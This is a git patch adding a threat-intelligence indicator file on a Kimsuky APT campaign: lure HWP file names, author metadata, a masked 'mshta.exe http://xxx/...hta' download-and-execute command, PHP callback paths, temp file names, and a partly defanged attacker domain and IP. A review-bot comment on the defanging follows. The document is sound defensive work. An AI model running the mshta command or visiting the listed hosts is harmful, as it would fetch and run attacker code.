From 7207c6819319c3f17f77b49901adddddf4585c40 Mon Sep 17 00:00:00 2001
From: blackorbird <137812951@qq.com>
Date: Wed, 3 Apr 2019 13:36:29 +0800
Subject: [PATCH] Update and rename mark-ioc to aptnote0403
---
kimsuky/aptnote0403 | 29 +++++++++++++++++++++++++++++
kimsuky/mark-ioc | 7 -------
2 files changed, 29 insertions(+), 7 deletions(-)
create mode 100644 kimsuky/aptnote0403
delete mode 100644 kimsuky/mark-ioc
diff --git a/kimsuky/aptnote0403 b/kimsuky/aptnote0403
new file mode 100644
index 0000000..7385bb4
--- /dev/null
+++ b/kimsuky/aptnote0403
@@ -0,0 +1,29 @@
+mark
+
+20190403
+Kimsuky Organization, Operation Stealth Power Silence Operation
+https://blog.alyac.co.kr/2234
+
+hwp:
+3.17 미국의 편타곤 비밀 국가안보회의.hwp
+최근 한반도 관련 주요국 동향.hwp
+the creator name "Tom"
+computer name : Tom
+
+mshta.exe http://xxx/shop/price/com/first.hta
+http://xxx/shop/price/com/expres.php?op=1
+http://xxx/shop/kcp/js/com/expres.php?op=1
+cow.php
+moonx.hta
+
+upload.php
+$env:temp\processlist.txt
+$env:temp\ttmuprc.ssa
+$env:temp\servcicelist.txt
+
+PDF:
+enindi25-142.godo.co[.]kr(106.249.25.142 )
+phishing:
+tcjst.com/img/dot[.]gif
+
+Operation Stealth Power related Low Kick (https://blog.alyac.co.kr/2209)
diff --git a/kimsuky/mark-ioc b/kimsuky/mark-ioc
deleted file mode 100644
index e454c5a..0000000
--- a/kimsuky/mark-ioc
+++ /dev/null
@@ -1,7 +0,0 @@
-mark
-
-20190403
-
-hwp: 최근 한반도 관련 주요국 동향.hwp
-the creator name "Tom"
-computer name : Tom
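Review bot: The indicators added in kimsuky/aptnote0403 are defanged inconsistently, which makes the file easy to mis-click from and awkward to parse for blocklists or detection rules. `enindi25-142.godo.co[.]kr` is bracketed but the address beside it, `106.249.25.142 `, is not (and carries a stray space before the closing parenthesis), and in `tcjst.com/img/dot[.]gif` the bracket sits on the file extension, so the domain itself stays linkable; `tcjst[.]com/img/dot.gif` and `106.249.25[.]142` would match the convention used on the godo line. The `http://xxx/...` entries have the host masked, so only the paths such as `/shop/price/com/expres.php?op=1` are usable for matching, and a one-line remark saying so would stop readers treating `xxx` as a hostname. `servcicelist.txt` looks as if it may be the spelling the sample itself uses; if so, marking it `(sic)` would keep a later editor from correcting it and breaking a file-name match.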